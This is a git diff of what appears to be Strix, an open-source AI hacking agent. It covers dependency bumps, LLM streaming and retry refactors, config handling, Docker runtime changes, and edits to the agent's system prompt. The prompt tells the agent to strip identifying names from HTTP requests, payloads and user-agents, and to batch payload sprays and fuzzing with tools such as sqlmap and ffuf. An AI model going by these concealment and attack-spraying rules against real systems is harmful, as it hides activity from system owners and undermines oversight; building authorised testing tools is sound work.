{file = "pyasn1-0.6.2-py3-none-any.whl", hash = "sha256:1eb26d860996a18e9b6ed05e7aae0e9fc21619fcee6af91cca9bad4fbea224bf"},
{file = "pyasn1-0.6.2.tar.gz", hash = "sha256:9b59a2b25ba7e4f8197db7686c09fb33e658b98339fadb826e9512629017833b"},
]
[[package]]
@@ -7095,19 +7105,19 @@ test = ["aiohttp (>=3.10.5)", "flake8 (>=5.0,<6.0)", "mypy (>=0.800)", "psutil",
[[package]]
name = "virtualenv"
version = "20.34.0"
version = "20.36.1"
description = "Virtual Python Environment builder"
optional = false
python-versions = ">=3.8"
groups = ["dev"]
files = [
{file = "virtualenv-20.34.0-py3-none-any.whl", hash = "sha256:341f5afa7eee943e4984a9207c025feedd768baff6753cd660c857ceb3e36026"},
{file = "virtualenv-20.34.0.tar.gz", hash = "sha256:44815b2c9dee7ed86e387b842a84f20b93f7f417f95886ca1996a72a4138eb1a"},
{file = "virtualenv-20.36.1-py3-none-any.whl", hash = "sha256:575a8d6b124ef88f6f51d56d656132389f961062a9177016a50e4f507bbcc19f"},
{file = "virtualenv-20.36.1.tar.gz", hash = "sha256:8befb5c81842c641f8ee658481e42641c68b5eab3521d8e092d18320902466ba"},
]
[package.dependencies]
distlib = ">=0.3.7,<1"
filelock = ">=3.12.2,<4"
filelock = {version = ">=3.20.1,<4", markers = "python_version >= \"3.10\""}
platformdirs = ">=3.9.1,<5"
[package.extras]
@@ -7424,4 +7434,4 @@ vertex = ["google-cloud-aiplatform"]
[metadata]
lock-version = "2.1"
python-versions = "^3.12"
content-hash = "91f49e313e5690bbef87e17730441f26d366daeccb16b5020e03e581fbb9d4d5"
content-hash = "0424a0e82fe49501f3a80166676e257a9dae97093d9bc730489789195f523735"

View File

@@ -1,6 +1,6 @@
[tool.poetry]
name = "strix-agent"
version = "0.6.0"
version = "0.6.2"
description = "Open-source AI Hackers for your apps"
authors = ["Strix <hi@usestrix.com>"]
readme = "README.md"
@@ -69,6 +69,7 @@ gql = { version = "^3.5.3", extras = ["requests"], optional = true }
pyte = { version = "^0.8.1", optional = true }
libtmux = { version = "^0.46.2", optional = true }
numpydoc = { version = "^1.8.0", optional = true }
defusedxml = "^0.7.1"
[tool.poetry.extras]
vertex = ["google-cloud-aiplatform"]

View File

@@ -4,7 +4,7 @@ set -euo pipefail
APP=strix
REPO="usestrix/strix"
STRIX_IMAGE="ghcr.io/usestrix/strix-sandbox:0.1.10"
STRIX_IMAGE="ghcr.io/usestrix/strix-sandbox:0.1.11"
MUTED='\033[0;2m'
RED='\033[0;31m'

View File

@@ -111,7 +111,6 @@ hiddenimports = [
'strix.llm.llm',
'strix.llm.config',
'strix.llm.utils',
'strix.llm.request_queue',
'strix.llm.memory_compressor',
'strix.runtime',
'strix.runtime.runtime',

View File

@@ -16,9 +16,9 @@ CLI OUTPUT:
- NEVER use "Strix" or any identifiable names/markers in HTTP requests, payloads, user-agents, or any inputs
INTER-AGENT MESSAGES:
- NEVER echo inter_agent_message or agent_completion_report XML content that is sent to you in your output.
- Process these internally without displaying the XML
- NEVER echo agent_identity XML blocks; treat them as internal metadata for identity only. Do not include them in outputs or tool calls.
- NEVER echo inter_agent_message or agent_completion_report blocks that are sent to you in your output.
- Process these internally without displaying them
- NEVER echo agent_identity blocks; treat them as internal metadata for identity only. Do not include them in outputs or tool calls.
- Minimize inter-agent messaging: only message when essential for coordination or assistance; avoid routine status updates; batch non-urgent information; prefer parent/child completion flows and shared artifacts over messaging
AUTONOMOUS BEHAVIOR:
@@ -301,24 +301,25 @@ PERSISTENCE IS MANDATORY:
</multi_agent_system>
<tool_usage>
Tool call format:
<function=tool_name>
<parameter=param_name>value</parameter>
</function>
CRITICAL RULES:
0. While active in the agent loop, EVERY message you output MUST be a single tool call. Do not send plain text-only responses.
1. Exactly one tool call per message — never include more than one <function>...</function> block in a single LLM message.
2. Tool call must be last in message
3. EVERY tool call MUST end with </function>. This is MANDATORY. Never omit the closing tag. End your response immediately after </function>.
4. Use ONLY the exact format shown above. NEVER use JSON/YAML/INI or any other syntax for tools or parameters.
5. When sending ANY multi-line content in tool parameters, use real newlines (actual line breaks). Do NOT emit literal "\n" sequences. Literal "\n" instead of real line breaks will cause tools to fail.
6. Tool names must match exactly the tool "name" defined (no module prefixes, dots, or variants).
- Correct: <function=think> ... </function>
- Incorrect: <thinking_tools.think> ... </function>
- Incorrect: <think> ... </think>
- Incorrect: {"think": {...}}
7. Parameters must use <parameter=param_name>value</parameter> exactly. Do NOT pass parameters as JSON or key:value lines. Do NOT add quotes/braces around values.
8. Do NOT wrap tool calls in markdown/code fences or add any text before or after the tool block.
Example (agent creation tool):
<function=create_agent>
@@ -331,6 +332,8 @@ SPRAYING EXECUTION NOTE:
- When performing large payload sprays or fuzzing, encapsulate the entire spraying loop inside a single python or terminal tool call (e.g., a Python script using asyncio/aiohttp). Do not issue one tool call per payload.
- Favor batch-mode CLI tools (sqlmap, ffuf, nuclei, zaproxy, arjun) where appropriate and check traffic via the proxy when beneficial
REMINDER: Always close each tool call with </function> before going into the next. Incomplete tool calls will fail.
{{ get_tools_prompt() }}
</tool_usage>

View File

@@ -1,7 +1,6 @@
import asyncio
import contextlib
import logging
from pathlib import Path
from typing import TYPE_CHECKING, Any, Optional
@@ -18,6 +17,7 @@ from strix.llm import LLM, LLMConfig, LLMRequestFailedError
from strix.llm.utils import clean_content
from strix.runtime import SandboxInitializationError
from strix.tools import process_tool_invocations
from strix.utils.resource_paths import get_strix_resource_path
from .state import AgentState
@@ -35,8 +35,7 @@ class AgentMeta(type):
if name == "BaseAgent":
return new_cls
prompt_dir = get_strix_resource_path("agents", name)
new_cls.agent_name = name
new_cls.jinja_env = Environment(
@@ -66,20 +65,21 @@ class BaseAgent(metaclass=AgentMeta):
self.llm_config = config.get("llm_config", self.default_llm_config)
if self.llm_config is None:
raise ValueError("llm_config is required but not provided")
state_from_config = config.get("state")
if state_from_config is not None:
self.state = state_from_config
else:
self.state = AgentState(
agent_name="Root Agent",
max_iterations=self.max_iterations,
)
self.llm = LLM(self.llm_config, agent_name=self.agent_name)
with contextlib.suppress(Exception):
self.llm.set_agent_identity(self.state.agent_name, self.state.agent_id)
self._current_task: asyncio.Task[Any] | None = None
self._force_stop = False
from strix.telemetry.tracer import get_global_tracer
@@ -157,6 +157,11 @@ class BaseAgent(metaclass=AgentMeta):
return self._handle_sandbox_error(e, tracer)
while True:
if self._force_stop:
self._force_stop = False
await self._enter_waiting_state(tracer, was_cancelled=True)
continue
self._check_agent_messages(self.state)
if self.state.is_waiting_for_input():
@@ -247,7 +252,8 @@ class BaseAgent(metaclass=AgentMeta):
continue
async def _wait_for_input(self) -> None:
import asyncio
if self._force_stop:
return
if self.state.has_waiting_timeout():
self.state.resume_from_waiting()
@@ -340,6 +346,7 @@ class BaseAgent(metaclass=AgentMeta):
async def _process_iteration(self, tracer: Optional["Tracer"]) -> bool:
final_response = None
async for response in self.llm.generate(self.state.get_conversation_history()):
final_response = response
if tracer and response.content:
@@ -585,6 +592,11 @@ class BaseAgent(metaclass=AgentMeta):
return True
def cancel_current_execution(self) -> None:
self._force_stop = True
if self._current_task and not self._current_task.done():
self._current_task.cancel()
try:
loop = self._current_task.get_loop()
loop.call_soon_threadsafe(self._current_task.cancel)
except RuntimeError:
self._current_task.cancel()
self._current_task = None
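The `cancel_current_execution` logic above goes through `call_soon_threadsafe` because an asyncio task may only be cancelled from the thread running its event loop. A minimal standalone sketch of the pattern (`long_job` is a hypothetical task):

```python
import asyncio
import threading

async def long_job() -> str:
    # Pretend work; a cancel arriving during the sleep is caught and
    # turned into a normal return value for the demo.
    try:
        await asyncio.sleep(60)
    except asyncio.CancelledError:
        return "cancelled"
    return "finished"

async def main() -> str:
    task = asyncio.create_task(long_job())
    loop = asyncio.get_running_loop()
    # Cancelling from a foreign thread must be marshalled onto the
    # task's own loop via call_soon_threadsafe.
    threading.Thread(target=lambda: loop.call_soon_threadsafe(task.cancel)).start()
    return await task

print(asyncio.run(main()))
```

Calling `task.cancel()` directly from another thread is not thread-safe, which is why the original falls back to it only when no running loop is reachable.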

View File

@@ -16,18 +16,30 @@ class Config:
litellm_base_url = None
ollama_api_base = None
strix_reasoning_effort = "high"
strix_llm_max_retries = "5"
strix_memory_compressor_timeout = "30"
llm_timeout = "300"
llm_rate_limit_delay = "4.0"
llm_rate_limit_concurrent = "1"
_LLM_CANONICAL_NAMES = (
"strix_llm",
"llm_api_key",
"llm_api_base",
"openai_api_base",
"litellm_base_url",
"ollama_api_base",
"strix_reasoning_effort",
"strix_llm_max_retries",
"strix_memory_compressor_timeout",
"llm_timeout",
)
# Tool & Feature Configuration
perplexity_api_key = None
strix_disable_browser = "false"
# Runtime Configuration
strix_image = "ghcr.io/usestrix/strix-sandbox:0.1.11"
strix_runtime_backend = "docker"
strix_sandbox_execution_timeout = "120"
strix_sandbox_connect_timeout = "10"
# Telemetry
@@ -45,6 +57,20 @@ class Config:
def tracked_vars(cls) -> list[str]:
return [name.upper() for name in cls._tracked_names()]
@classmethod
def _llm_env_vars(cls) -> set[str]:
return {name.upper() for name in cls._LLM_CANONICAL_NAMES}
@classmethod
def _llm_env_changed(cls, saved_env: dict[str, Any]) -> bool:
for var_name in cls._llm_env_vars():
current = os.getenv(var_name)
if current is None:
continue
if saved_env.get(var_name) != current:
return True
return False
@classmethod
def get(cls, name: str) -> str | None:
env_name = name.upper()
@@ -88,10 +114,25 @@ class Config:
def apply_saved(cls) -> dict[str, str]:
saved = cls.load()
env_vars = saved.get("env", {})
if not isinstance(env_vars, dict):
env_vars = {}
cleared_vars = {
var_name
for var_name in cls.tracked_vars()
if var_name in os.environ and os.environ.get(var_name) == ""
}
if cleared_vars:
for var_name in cleared_vars:
env_vars.pop(var_name, None)
cls.save({"env": env_vars})
if cls._llm_env_changed(env_vars):
for var_name in cls._llm_env_vars():
env_vars.pop(var_name, None)
cls.save({"env": env_vars})
applied = {}
for var_name, var_value in env_vars.items():
if var_name in cls.tracked_vars() and var_name not in os.environ:
os.environ[var_name] = var_value
applied[var_name] = var_value
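A minimal sketch of the clearing convention implemented in `apply_saved` above, with hypothetical variable names: a tracked variable exported as an empty string drops the saved value, and saved values never override variables already set in the process:

```python
import os

def apply_saved(saved: dict[str, str], tracked: set[str]) -> dict[str, str]:
    env = dict(saved)
    # An empty-string export means "the user cleared this variable":
    # drop it from the saved snapshot rather than re-applying it.
    for name in tracked:
        if os.environ.get(name) == "":
            env.pop(name, None)
    applied = {}
    # Only fill in variables the current process has not set itself.
    for name, value in env.items():
        if name in tracked and name not in os.environ:
            os.environ[name] = value
            applied[name] = value
    return applied

os.environ["DEMO_CLEARED"] = ""  # user cleared this one
print(apply_saved({"DEMO_CLEARED": "old", "DEMO_KEPT": "value"},
                  {"DEMO_CLEARED", "DEMO_KEPT"}))
```

Note the `var_name not in os.environ` check mirrors the fix in the diff: an empty string counts as "set", whereas `os.getenv` truthiness would have treated it as unset.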

View File

@@ -112,22 +112,13 @@ class PythonRenderer(BaseToolRenderer):
return
stdout = result.get("stdout", "")
stderr = result.get("stderr", "")
stdout = cls._clean_output(stdout) if stdout else ""
stderr = cls._clean_output(stderr) if stderr else ""
if stdout:
text.append("\n")
formatted_output = cls._format_output(stdout)
text.append_text(formatted_output)
if stderr:
text.append("\n")
text.append(" stderr: ", style="bold #ef4444")
formatted_stderr = cls._format_output(stderr)
text.append_text(formatted_stderr)
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})

View File

@@ -180,7 +180,6 @@ def check_duplicate(
"model": model_name,
"messages": messages,
"timeout": 120,
"temperature": 0,
}
if api_key:
completion_kwargs["api_key"] = api_key

View File

@@ -1,60 +1,29 @@
import asyncio
import logging
from collections.abc import AsyncIterator
from dataclasses import dataclass
from enum import Enum
from pathlib import Path
from typing import Any
import litellm
from jinja2 import Environment, FileSystemLoader, select_autoescape
from litellm import acompletion, completion_cost, stream_chunk_builder, supports_reasoning
from litellm.utils import supports_prompt_caching, supports_vision
from strix.config import Config
from strix.llm.config import LLMConfig
from strix.llm.memory_compressor import MemoryCompressor
from strix.llm.utils import (
_truncate_to_first_function,
fix_incomplete_tool_call,
parse_tool_invocations,
)
from strix.skills import load_skills
from strix.tools import get_tools_prompt
from strix.utils.resource_paths import get_strix_resource_path
logger = logging.getLogger(__name__)
litellm.drop_params = True
litellm.modify_params = True
class LLMRequestFailedError(Exception):
def __init__(self, message: str, details: str | None = None):
@@ -63,20 +32,11 @@ class LLMRequestFailedError(Exception):
self.details = details
class StepRole(str, Enum):
AGENT = "agent"
USER = "user"
SYSTEM = "system"
@dataclass
class LLMResponse:
content: str
tool_invocations: list[dict[str, Any]] | None = None
scan_id: str | None = None
step_number: int = 1
role: StepRole = StepRole.AGENT
thinking_blocks: list[dict[str, Any]] | None = None
@dataclass
@@ -84,76 +44,63 @@ class RequestStats:
input_tokens: int = 0
output_tokens: int = 0
cached_tokens: int = 0
cache_creation_tokens: int = 0
cost: float = 0.0
requests: int = 0
failed_requests: int = 0
def to_dict(self) -> dict[str, int | float]:
return {
"input_tokens": self.input_tokens,
"output_tokens": self.output_tokens,
"cached_tokens": self.cached_tokens,
"cache_creation_tokens": self.cache_creation_tokens,
"cost": round(self.cost, 4),
"requests": self.requests,
"failed_requests": self.failed_requests,
}
class LLM:
def __init__(self, config: LLMConfig, agent_name: str | None = None):
self.config = config
self.agent_name = agent_name
self.agent_id: str | None = None
self._total_stats = RequestStats()
self._last_request_stats = RequestStats()
self.system_prompt = self._load_system_prompt(agent_name)
reasoning = Config.get("strix_reasoning_effort")
if reasoning:
self._reasoning_effort = reasoning
elif config.scan_mode == "quick":
self._reasoning_effort = "medium"
else:
self._reasoning_effort = "high"
self.memory_compressor = MemoryCompressor(
model_name=self.config.model_name,
timeout=self.config.timeout,
)
def _load_system_prompt(self, agent_name: str | None) -> str:
if not agent_name:
return ""
try:
prompt_dir = get_strix_resource_path("agents", agent_name)
skills_dir = get_strix_resource_path("skills")
env = Environment(
loader=FileSystemLoader([prompt_dir, skills_dir]),
autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),
)
skills_to_load = [
*list(self.config.skills or []),
f"scan_modes/{self.config.scan_mode}",
]
skill_content = load_skills(skills_to_load, env)
env.globals["get_skill"] = lambda name: skill_content.get(name, "")
result = env.get_template("system_prompt.jinja").render(
get_tools_prompt=get_tools_prompt,
loaded_skill_names=list(skill_content.keys()),
**skill_content,
)
return str(result)
except Exception:  # noqa: BLE001
return ""
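The template-loading pattern above (an `Environment` with a `get_skill` global injected before rendering) can be sketched with an in-memory loader; the template and skill content below are assumed for the demo, while the real code loads `system_prompt.jinja` from packaged resources:

```python
from jinja2 import DictLoader, Environment

# In-memory stand-in for the FileSystemLoader over prompt/skills dirs.
env = Environment(loader=DictLoader({
    "system_prompt.jinja": "{{ get_skill('recon') }}",
}))

# Skills resolved ahead of time, exposed to templates via a global.
skills = {"recon": "Enumerate subdomains first."}
env.globals["get_skill"] = lambda name: skills.get(name, "")

prompt = env.get_template("system_prompt.jinja").render()
print(prompt)
```

Registering `get_skill` on `env.globals` makes it available to every template rendered by that environment, which is why the real loader can reference skills from inside `system_prompt.jinja` without passing them as render arguments.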
def set_agent_identity(self, agent_name: str | None, agent_id: str | None) -> None:
if agent_name:
@@ -161,328 +108,121 @@ class LLM:
if agent_id:
self.agent_id = agent_id
async def generate(
self, conversation_history: list[dict[str, Any]]
) -> AsyncIterator[LLMResponse]:
messages = self._prepare_messages(conversation_history)
max_retries = int(Config.get("strix_llm_max_retries") or "5")
for attempt in range(max_retries + 1):
try:
async for response in self._stream(messages):
yield response
return  # noqa: TRY300
except Exception as e:  # noqa: BLE001
if attempt >= max_retries or not self._should_retry(e):
self._raise_error(e)
wait = min(10, 2 * (2**attempt))
await asyncio.sleep(wait)
async def _stream(self, messages: list[dict[str, Any]]) -> AsyncIterator[LLMResponse]:
accumulated = ""
chunks: list[Any] = []
self._total_stats.requests += 1
response = await acompletion(**self._build_completion_args(messages), stream=True)
async for chunk in response:
chunks.append(chunk)
delta = self._get_chunk_content(chunk)
if delta:
accumulated += delta
if "</function>" in accumulated:
accumulated = accumulated[
: accumulated.find("</function>") + len("</function>")
]
yield LLMResponse(content=accumulated)
break
yield LLMResponse(content=accumulated)
if chunks:
self._update_usage_stats(stream_chunk_builder(chunks))
accumulated = fix_incomplete_tool_call(_truncate_to_first_function(accumulated))
yield LLMResponse(
content=accumulated,
tool_invocations=parse_tool_invocations(accumulated),
thinking_blocks=self._extract_thinking(chunks),
)
def _prepare_messages(self, conversation_history: list[dict[str, Any]]) -> list[dict[str, Any]]:
messages = [{"role": "system", "content": self.system_prompt}]
if self.agent_name:
messages.append(
{
"role": "user",
"content": (
f"\n\n<agent_identity>\n"
f"<meta>Internal metadata: do not echo or reference.</meta>\n"
f"<agent_name>{self.agent_name}</agent_name>\n"
f"<agent_id>{self.agent_id}</agent_id>\n"
f"</agent_identity>\n\n"
),
}
)
compressed = list(self.memory_compressor.compress_history(conversation_history))
conversation_history.clear()
conversation_history.extend(compressed)
messages.extend(compressed)
if self._is_anthropic() and self.config.enable_prompt_caching:
messages = self._add_cache_control(messages)
return messages
def _build_completion_args(self, messages: list[dict[str, Any]]) -> dict[str, Any]:
if not self._supports_vision():
messages = self._strip_images(messages)
args: dict[str, Any] = {
"model": self.config.model_name,
"messages": messages,
"timeout": self.config.timeout,
"stream_options": {"include_usage": True},
}
if api_key := Config.get("llm_api_key"):
args["api_key"] = api_key
if api_base := (
Config.get("llm_api_base")
or Config.get("openai_api_base")
or Config.get("litellm_base_url")
or Config.get("ollama_api_base")
):
args["api_base"] = api_base
if self._supports_reasoning():
args["reasoning_effort"] = self._reasoning_effort
return args
def _get_chunk_content(self, chunk: Any) -> str:
if chunk.choices and hasattr(chunk.choices[0], "delta"):
return getattr(chunk.choices[0].delta, "content", "") or ""
return ""
@property
def usage_stats(self) -> dict[str, dict[str, int | float]]:
return {
"total": self._total_stats.to_dict(),
"last_request": self._last_request_stats.to_dict(),
}
def get_cache_config(self) -> dict[str, bool]:
return {
"enabled": self.config.enable_prompt_caching,
"supported": supports_prompt_caching(self.config.model_name),
}
def _extract_thinking(self, chunks: list[Any]) -> list[dict[str, Any]] | None:
if not chunks or not self._supports_reasoning():
return None
try:
resp = stream_chunk_builder(chunks)
if resp.choices and hasattr(resp.choices[0].message, "thinking_blocks"):
blocks: list[dict[str, Any]] = resp.choices[0].message.thinking_blocks
return blocks
except Exception:  # noqa: BLE001, S110 # nosec B110
pass
return None
def _update_usage_stats(self, response: Any) -> None:
try:
@@ -491,45 +231,88 @@ class LLM:
output_tokens = getattr(response.usage, "completion_tokens", 0)
cached_tokens = 0
cache_creation_tokens = 0
if hasattr(response.usage, "prompt_tokens_details"):
prompt_details = response.usage.prompt_tokens_details
if hasattr(prompt_details, "cached_tokens"):
cached_tokens = prompt_details.cached_tokens or 0
if hasattr(response.usage, "cache_creation_input_tokens"):
cache_creation_tokens = response.usage.cache_creation_input_tokens or 0
else:
input_tokens = 0
output_tokens = 0
cached_tokens = 0
cache_creation_tokens = 0
try:
cost = completion_cost(response) or 0.0
except Exception:  # noqa: BLE001
cost = 0.0
self._total_stats.input_tokens += input_tokens
self._total_stats.output_tokens += output_tokens
self._total_stats.cached_tokens += cached_tokens
self._total_stats.cache_creation_tokens += cache_creation_tokens
self._total_stats.cost += cost
self._last_request_stats.input_tokens = input_tokens
self._last_request_stats.output_tokens = output_tokens
self._last_request_stats.cached_tokens = cached_tokens
self._last_request_stats.cache_creation_tokens = cache_creation_tokens
self._last_request_stats.cost = cost
except Exception:  # noqa: BLE001, S110 # nosec B110
pass
def _should_retry(self, e: Exception) -> bool:
code = getattr(e, "status_code", None) or getattr(
getattr(e, "response", None), "status_code", None
)
return code is None or litellm._should_retry(code)
def _raise_error(self, e: Exception) -> None:
from strix.telemetry import posthog
posthog.error("llm_error", type(e).__name__)
raise LLMRequestFailedError(f"LLM request failed: {type(e).__name__}", str(e)) from e
def _is_anthropic(self) -> bool:
if not self.config.model_name:
return False
return any(p in self.config.model_name.lower() for p in ["anthropic/", "claude"])
def _supports_vision(self) -> bool:
try:
return bool(supports_vision(model=self.config.model_name))
except Exception: # noqa: BLE001
return False
def _supports_reasoning(self) -> bool:
try:
return bool(supports_reasoning(model=self.config.model_name))
except Exception: # noqa: BLE001
return False
def _strip_images(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
result = []
for msg in messages:
content = msg.get("content")
if isinstance(content, list):
text_parts = []
for item in content:
if isinstance(item, dict) and item.get("type") == "text":
text_parts.append(item.get("text", ""))
elif isinstance(item, dict) and item.get("type") == "image_url":
text_parts.append("[Image removed - model doesn't support vision]")
result.append({**msg, "content": "\n".join(text_parts)})
else:
result.append(msg)
return result
def _add_cache_control(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
if not messages or not supports_prompt_caching(self.config.model_name):
return messages
result = list(messages)
if result[0].get("role") == "system":
content = result[0]["content"]
result[0] = {
**result[0],
"content": [
{"type": "text", "text": content, "cache_control": {"type": "ephemeral"}}
]
if isinstance(content, str)
else content,
}
return result
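The retry loop in `generate()` above waits `min(10, 2 * 2**attempt)` seconds between attempts, i.e. exponential backoff capped at 10 seconds. A standalone sketch of the resulting schedule:

```python
def backoff_schedule(max_retries: int) -> list[int]:
    # One wait per attempt: 2, 4, 8, then capped at 10 seconds.
    return [min(10, 2 * (2**attempt)) for attempt in range(max_retries + 1)]

print(backoff_schedule(5))
```

With the default of 5 retries the total worst-case wait stays under a minute, which suits the per-request failure tracking in `_should_retry`.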

View File

@@ -86,7 +86,7 @@ def _extract_message_text(msg: dict[str, Any]) -> str:
def _summarize_messages(
messages: list[dict[str, Any]],
model: str,
timeout: int = 30,
) -> dict[str, Any]:
if not messages:
empty_summary = "<context_summary message_count='0'>{text}</context_summary>"
@@ -148,11 +148,11 @@ class MemoryCompressor:
self,
max_images: int = 3,
model_name: str | None = None,
timeout: int | None = None,
):
self.max_images = max_images
self.model_name = model_name or Config.get("strix_llm")
self.timeout = timeout or int(Config.get("strix_memory_compressor_timeout") or "30")
if not self.model_name:
raise ValueError("STRIX_LLM environment variable must be set and not empty")

View File

@@ -1,58 +0,0 @@
import asyncio
import threading
import time
from collections.abc import AsyncIterator
from typing import Any
from litellm import acompletion
from litellm.types.utils import ModelResponseStream
from strix.config import Config
class LLMRequestQueue:
def __init__(self) -> None:
self.delay_between_requests = float(Config.get("llm_rate_limit_delay") or "4.0")
self.max_concurrent = int(Config.get("llm_rate_limit_concurrent") or "1")
self._semaphore = threading.BoundedSemaphore(self.max_concurrent)
self._last_request_time = 0.0
self._lock = threading.Lock()
async def stream_request(
self, completion_args: dict[str, Any]
) -> AsyncIterator[ModelResponseStream]:
try:
while not self._semaphore.acquire(timeout=0.2):
await asyncio.sleep(0.1)
with self._lock:
now = time.time()
time_since_last = now - self._last_request_time
sleep_needed = max(0, self.delay_between_requests - time_since_last)
self._last_request_time = now + sleep_needed
if sleep_needed > 0:
await asyncio.sleep(sleep_needed)
async for chunk in self._stream_request(completion_args):
yield chunk
finally:
self._semaphore.release()
async def _stream_request(
self, completion_args: dict[str, Any]
) -> AsyncIterator[ModelResponseStream]:
response = await acompletion(**completion_args, stream=True)
async for chunk in response:
yield chunk
_global_queue: LLMRequestQueue | None = None
def get_global_queue() -> LLMRequestQueue:
global _global_queue # noqa: PLW0603
if _global_queue is None:
_global_queue = LLMRequestQueue()
return _global_queue

View File

@@ -18,7 +18,7 @@ def _truncate_to_first_function(content: str) -> str:
def parse_tool_invocations(content: str) -> list[dict[str, Any]] | None:
content = fix_incomplete_tool_call(content)
tool_invocations: list[dict[str, Any]] = []
@@ -46,16 +46,15 @@ def parse_tool_invocations(content: str) -> list[dict[str, Any]] | None:
return tool_invocations if tool_invocations else None
def fix_incomplete_tool_call(content: str) -> str:
"""Fix incomplete tool calls by adding missing </function> tag."""
if (
"<function=" in content
and content.count("<function=") == 1
and "</function>" not in content
):
content = content.rstrip()
content = content + "function>" if content.endswith("</") else content + "\n</function>"
return content
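For illustration, the repair above behaves like this standalone copy: a message with exactly one opened `<function=...>` call and no close tag gets the missing `</function>` appended, completing a partially emitted suffix when the text ends with `</`:

```python
def fix_incomplete_tool_call(content: str) -> str:
    # Only repair when exactly one tool call was opened and never closed.
    if (
        "<function=" in content
        and content.count("<function=") == 1
        and "</function>" not in content
    ):
        content = content.rstrip()
        # A trailing "</" is a truncated close tag; finish it in place,
        # otherwise append a full close tag on its own line.
        content = content + "function>" if content.endswith("</") else content + "\n</function>"
    return content

print(fix_incomplete_tool_call("<function=think>\nidea</"))
print(fix_incomplete_tool_call("<function=think>\nidea"))
```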
@@ -74,7 +73,7 @@ def clean_content(content: str) -> str:
if not content:
return ""
content = _fix_stopword(content)
content = fix_incomplete_tool_call(content)
tool_pattern = r"<function=[^>]+>.*?</function>"
cleaned = re.sub(tool_pattern, "", content, flags=re.DOTALL)
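`fix_incomplete_tool_call` is small enough to exercise standalone; this copy mirrors the condensed version in the hunk above:

```python
def fix_incomplete_tool_call(content: str) -> str:
    """Append the missing </function> tag to a single unterminated tool call."""
    if (
        "<function=" in content
        and content.count("<function=") == 1
        and "</function>" not in content
    ):
        content = content.rstrip()
        # A trailing "</" means the tag was cut mid-write; finish it in place.
        content = content + "function>" if content.endswith("</") else content + "\n</function>"
    return content
```

Content with zero or multiple `<function=` openings, or an already-closed call, passes through untouched.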


@@ -1,15 +1,13 @@
import contextlib
import logging
import os
import secrets
import socket
import time
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import TimeoutError as FuturesTimeoutError
from pathlib import Path
from typing import Any, cast
from typing import cast
import docker
import httpx
from docker.errors import DockerException, ImageNotFound, NotFound
from docker.models.containers import Container
from requests.exceptions import ConnectionError as RequestsConnectionError
@@ -22,10 +20,8 @@ from .runtime import AbstractRuntime, SandboxInfo
HOST_GATEWAY_HOSTNAME = "host.docker.internal"
DOCKER_TIMEOUT = 60 # seconds
TOOL_SERVER_HEALTH_REQUEST_TIMEOUT = 5 # seconds per health check request
TOOL_SERVER_HEALTH_RETRIES = 10 # number of retries for health check
logger = logging.getLogger(__name__)
DOCKER_TIMEOUT = 60
CONTAINER_TOOL_SERVER_PORT = 48081
class DockerRuntime(AbstractRuntime):
@@ -33,50 +29,20 @@ class DockerRuntime(AbstractRuntime):
try:
self.client = docker.from_env(timeout=DOCKER_TIMEOUT)
except (DockerException, RequestsConnectionError, RequestsTimeout) as e:
logger.exception("Failed to connect to Docker daemon")
if isinstance(e, RequestsConnectionError | RequestsTimeout):
raise SandboxInitializationError(
"Docker daemon unresponsive",
f"Connection timed out after {DOCKER_TIMEOUT} seconds. "
"Please ensure Docker Desktop is installed and running, "
"and try running strix again.",
) from e
raise SandboxInitializationError(
"Docker is not available",
"Docker is not available or not configured correctly. "
"Please ensure Docker Desktop is installed and running, "
"and try running strix again.",
"Please ensure Docker Desktop is installed and running.",
) from e
self._scan_container: Container | None = None
self._tool_server_port: int | None = None
self._tool_server_token: str | None = None
def _generate_sandbox_token(self) -> str:
return secrets.token_urlsafe(32)
def _find_available_port(self) -> int:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(("", 0))
return cast("int", s.getsockname()[1])
def _exec_run_with_timeout(
self, container: Container, cmd: str, timeout: int = DOCKER_TIMEOUT, **kwargs: Any
) -> Any:
with ThreadPoolExecutor(max_workers=1) as executor:
future = executor.submit(container.exec_run, cmd, **kwargs)
try:
return future.result(timeout=timeout)
except FuturesTimeoutError:
logger.exception(f"exec_run timed out after {timeout}s: {cmd[:100]}...")
raise SandboxInitializationError(
"Container command timed out",
f"Command timed out after {timeout} seconds. "
"Docker may be overloaded or unresponsive. "
"Please ensure Docker Desktop is installed and running, "
"and try running strix again.",
) from None
def _get_scan_id(self, agent_id: str) -> str:
try:
from strix.telemetry.tracer import get_global_tracer
@@ -84,129 +50,118 @@ class DockerRuntime(AbstractRuntime):
tracer = get_global_tracer()
if tracer and tracer.scan_config:
return str(tracer.scan_config.get("scan_id", "default-scan"))
except ImportError:
logger.debug("Failed to import tracer, using fallback scan ID")
except AttributeError:
logger.debug("Tracer missing scan_config, using fallback scan ID")
except (ImportError, AttributeError):
pass
return f"scan-{agent_id.split('-')[0]}"
def _verify_image_available(self, image_name: str, max_retries: int = 3) -> None:
def _validate_image(image: docker.models.images.Image) -> None:
if not image.id or not image.attrs:
raise ImageNotFound(f"Image {image_name} metadata incomplete")
for attempt in range(max_retries):
try:
image = self.client.images.get(image_name)
_validate_image(image)
except ImageNotFound:
if not image.id or not image.attrs:
raise ImageNotFound(f"Image {image_name} metadata incomplete") # noqa: TRY301
except (ImageNotFound, DockerException):
if attempt == max_retries - 1:
logger.exception(f"Image {image_name} not found after {max_retries} attempts")
raise
logger.warning(f"Image {image_name} not ready, attempt {attempt + 1}/{max_retries}")
time.sleep(2**attempt)
except DockerException:
if attempt == max_retries - 1:
logger.exception(f"Failed to verify image {image_name}")
raise
logger.warning(f"Docker error verifying image, attempt {attempt + 1}/{max_retries}")
time.sleep(2**attempt)
else:
logger.debug(f"Image {image_name} verified as available")
return
def _create_container_with_retry(self, scan_id: str, max_retries: int = 3) -> Container:
last_exception = None
def _recover_container_state(self, container: Container) -> None:
for env_var in container.attrs["Config"]["Env"]:
if env_var.startswith("TOOL_SERVER_TOKEN="):
self._tool_server_token = env_var.split("=", 1)[1]
break
port_bindings = container.attrs.get("NetworkSettings", {}).get("Ports", {})
port_key = f"{CONTAINER_TOOL_SERVER_PORT}/tcp"
if port_bindings.get(port_key):
self._tool_server_port = int(port_bindings[port_key][0]["HostPort"])
